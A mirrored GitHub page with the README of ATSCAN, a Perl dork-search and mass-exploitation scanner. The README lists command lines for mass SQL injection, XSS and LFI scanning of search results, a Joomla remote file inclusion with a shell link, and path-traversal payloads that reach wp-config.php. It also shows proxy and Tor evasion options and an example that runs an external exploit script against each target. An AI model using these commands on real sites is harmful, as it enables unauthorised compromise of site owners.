Giter Site home page Giter Site logo

fahri314 / atscan Goto Github PK

View Code? Open in Web Editor NEW

This project forked from alisamtechnology/atscan

0.0 2.0 0.0 1.62 MB

Advanced Search & Dork Mass Exploit - فاحص متقدم لبحث و استغلال الثغرات بالجملة

License: MIT License

Perl 96.55% Shell 3.45%

atscan's Introduction

ATSCAN

Advanced Search / Dork / Mass Exploitation Scanner
فاحص متقدم لبحث و استغلال الثغرات بالجملة

Alisam Technology is not responsible for any misuse, damage caused by this script or attacking targets without prior mutual consent!
Tool: ATSCAN version 12
Codename:Anon4t
AUTHOR:Ali MEHDIOUI
GROUP:Alisam Technology
FACE:facebook.com/Alisam.Technology
YOUTUBE:youtube.com/c/AlisamTechnology
TWITTER:twitter.com/AlisamTechno
PLUS:plus.google.com/+AlisamTechnology
Description:

● Search engine Google / Bing / Ask / Yandex / Sogou
● Mass Dork Search
● Multiple instant scans.
● Mass Exploitation
● Use proxy.
● Random user agent.
● Random engine.
● Extern commands execution.
● XSS / SQLI / LFI / AFD scanner.
● Filter wordpress and Joomla sites in the server.
● Find Admin page.
● Decode / Encode Base64 / MD5
● Ports scan.
● Extract IPs
● Extract E-mails.
● Auto detect errors.
● Auto detect Cms.
● Post data.
● Auto sequence repeater.
● Validation.
● Post and Get method
● And more...

★ Libreries to install:
Perl Required.
Works in all platforms. Disponible in Blackarch linux and Dracos systems.
Download:
● git clone https://github.com/AlisamTechnology/ATSCAN
● direct link: https://github.com/AlisamTechnology/ATSCAN
Permissions:
cd ATSCAN
chmod +x ./atscan.pl
Installation:
chmod +x ./install.sh
./install.sh
Execution:
Portable Execution: perl ./atscan.pl
Installed Tool Execution: atscan
Uninstall Tool:
atscan --uninstall
Screenshots:






Commands:
--help / -h / -? Help.
--proxy Set tor proxy for scans [EX: --proxy "socks://localhost:9050"]
Set proxy [EX: --proxy "http://12.45.44.2:8080"]
Set proxy list [EX: --proxy list.txt]
-m Set engine motors default bing EX: -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]
--proxy-random Random proxy [EX: --proxy-random list.txt] or --proxy-random "socks://localhost:9050"]
--m-random Random of all disponibles engines
--b-random Random all disponibles agents
--freq Random time frequency (in seconds)
--time set browser time out
--dork / -d Dork to search [Ex: house [OTHER]cars [OTHER]hotel]
-t Target
--level / -l Scan level (+- Number of page results to scan)
-p Set test parameter EX:id,cat,product_ID
--save / -s Output.
--content Print request content
--data data. See examples
--post Use post method
--get Use get method
--header Set headers
--host Domain name [Ex: site.com]
--nobanner Hide tool banner
--beep Produce beep sound if positive scan found.
--ifend Produce beep sound when scan process is finished.
--noinfo Jump extra results info.
--noping No host ping.
--limit Limit max positive scan results.
--valid / -v Validate by string
--status Validate by http header status
--ifinurl Get targets with exact string matching
--sregex Get targets with exact regex matching
--unique Get targets with exact dork matching
--replace String to replace
--with String to replace with
--full --replace --full Will replace all url parametres from string to the end
--payload Use your own payloads instead of tool ones
--exp Exploit/Payload
--sql Xss scan
--lfi Local file inclusion
--joomrfi Scan for joomla local file inclusion.
--shell Shell link [Ex: http://www.site.com/shell.txt]
--wpafd Scan wordpress sites for arbitery file download
--admin Get site admin page
--shost Get site subdomains
--tcp TCP port
--udp UDP port
--sites Sites in the server
--wp Wordpress sites in the server
--joom Joomla sites in the server
--upload Get sites with upload files in the server
--zip Get sites with zip files in the server
--md5 Convert to md5
--encode64 Encode base64 string
--decode64 decode base64 string
--TARGET Will be replaced by target in extern command
--HOST Will be replaced by host in extern command
--HOSTIP Will be replaced by host IP in extern command
--PORT Will be replaced by open port in extern command
--ip Crawl to get Ips
--regex Crawl to get strings matching regex
--noquery Remove string value from Query url [ex: site.com/index.php?id=string]
--command /-c Extern Command to execute
--email Get emails
rang(x-y) EX: --exp "/index.php?id=rang(1-9)" --sql OR -t "site.com/index.php?id=rang(1-9)" --sql
site.com/index.php?id=1 -> 9.
repeat(txt-y) EX: --exp "/index.php?id=repeat(../-9)wp-config.php" --sql OR -t "site.com/index.php?id=../wp-config.php"
In site.com/index.php?id=../wp-config.php then site.com/index.php?id=../../wp-config.php 9 times
[OTHER] To separate values ex: dork1 [OTHER]DORK2 [OTHER]DORK3
[DATA/DATAFILE] To separate data values ex: --data "name:username [DATA]email:xxxxxx [DATA]pass:xxxxx/[DATAFILE]pass:file.txt"
--update Update tool
--tool Tool info.
--config User configuration.
--uninstall Uninstall Tool.
Examples:
PROXY:
Tor: --proxy [proxy] [Ex: --proxy socks://localhost:9050].
Proxy: Proxy: --proxy [proxy] Ex: http://12.32.1.5:8080
or --proxy list.txt Ex: --proxy my_proxies.txt
RANDOM:
Random proxy --proxy-random [proxy list.txt]
Random browser --b-random
Random engine --m-random
SET HEADERS:
atscan --dork [dork / dorks.txt] --level [level] --header "Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1"
atscan -t target --data "name:userfile[DATAFILE]value:file.txt --post --header "Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1"
SEARCH ENGINE:
Search: atscan --dork [dork> --level [level]
Search: atscan -d [dork> -l [level]
Set engine: atscan --dork [dork> --level [level] -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]
Set selective engines: atscan -d [dork> -l [level] -m 1,2,3..
Search with many dorks: atscan --dork [dork1 [OTHER]dork2 [OTHER]dork3> --level [level]
Search and rand: atscan -d [dork] -l [level] --exp "/index.php?id=rang(1-9)" --sql
Get Server sites: atscan -t [ip] --level [value] --sites
Get Server sites: atscan -t "[ip from]-[ip to]" --level [value] --sites
Get Server sites: atscan -t "ip1 [OTHER]ip2" --level [value] --sites
Get Server wordpress sites: atscan -t [ip] --level [value] --wp
Get Server joomla sites: atscan -t [ip] --level value] --joom
Get Server upload sites: atscan -t [ip] --level [value] --upload
Get Server zip sites files: atscan -t [ip] --level value] --zip
WP Arbitry File Download: atscan -t [ip] --level [[[value] --wpafd
Joomla RFI: atscan -t [ip] --level [10] --joomfri --shell [shell link]
Search + output: atscan --dork [dorks.txt] --level [level] --save
Search + get emails: atscan -d [dorks.txt] -l [level] --email
Search + get site emails: atscan --dork site:site.com --level [level] --email
Search + get ips: atscan --dork [dork] --level [level] --ip
REGULAR EXPRESSIONS:
Regex use: atscan [--dork [dork> / -t [target]] --level [level] --regex [regex]
IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){ 3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))
E-mails: '((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9]+@((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})'
REPEATER:
atscan -t site.com?index.php?id=rang(1-10) --sql
atscan -t [target] --exp "/index.php?id=rang(1-10)" --sql
atscan -t [target] --exp "/index.php?id=repeat(../-9)wp-config.php"
PORTS
atscan -t [ip] --port [port] [--udp / --tcp]
atscan -t (ip start)-(ip end) --port [port] [--udp / --tcp]
atscan -t [ip] --port (port start)-(port end) [--udp / --tcp] --command "your extern command"
ENCODE / DECODE:
Generate MD5: --md5 [string]
Encode base64: --encode64 [string]
Decode base64: --decode64 [string]
DATA:
Post data: atscan -t [target] --data "field1:value1 [DATA]field2:value2 [DATA]field3:value3" [--post / --get]
Wordlist: atscan -t [target] --data "name:userfile [DATAFILE]value:file.txt" [--post / --get]
atscan -t [target] --data "username:john [DATA]pass:1234" [--post / --get]
Post + Validation: --data "name:userfile [DATAFILE]value:file.txt" -v [string] / --status [code] [--post / --get]
EXTERNAL COMMANDES:
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --TARGET"
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --HOST"
atscan --dork [dork / dorks.txt] --level [level] --command "nmap -sV -p 21,22,80 --HOSTIP"
atscan -d "index of /lib/scripts/dl-skin.php" -l 20 -m 2 --command "php WP-dl-skin.php-exploit.php --TARGET"
MULTIPLE SCANS:
atscan --dork [dork> --level [10] --sql --lfi --wp ..
atscan --dork [dork> --level [10] --replace [string] --with [string] --exp [payload] [--sql / --lfi / --wp /...]
atscan -t [ip] --level [10] [--sql / --lfi / --wp /...]
atscan -t [target] [--sql / --lfi / --wp /...]
USER PAYLOADS:
atscan --dork [dork] --level [10] [--lfi | --sql ..] --payload [payload | payloads.txt]
SEARCH VALIDATION:
atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] --ifinurl [string]
atscan -d [dork / dorks.txt] -l [level] --regex [regex] --valid [string]
atscan -d [dork / dorks.txt] -l [level] --unique
SCAN VALIDATION:
atscan -t [target / targets.txt] [--status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] --exp [payload] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] [--admin / --sql ..] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --full --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --exp [payload] --status [code] / --valid [string]
atscan --data "name:userfile[DATAFILE]value:file.txt" -v [string] / --status [code] [--post / --get]
atscan -d [dork / dorks.txt] -l [level] [--sql / --shost ..] --status [code] / --valid [string]
UPDATE TOOL:
atscan --update
UNINSTALL TOOL:
atscan --uninstall

atscan's People

Contributors

alisamtechnology avatar

Watchers

avatar avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.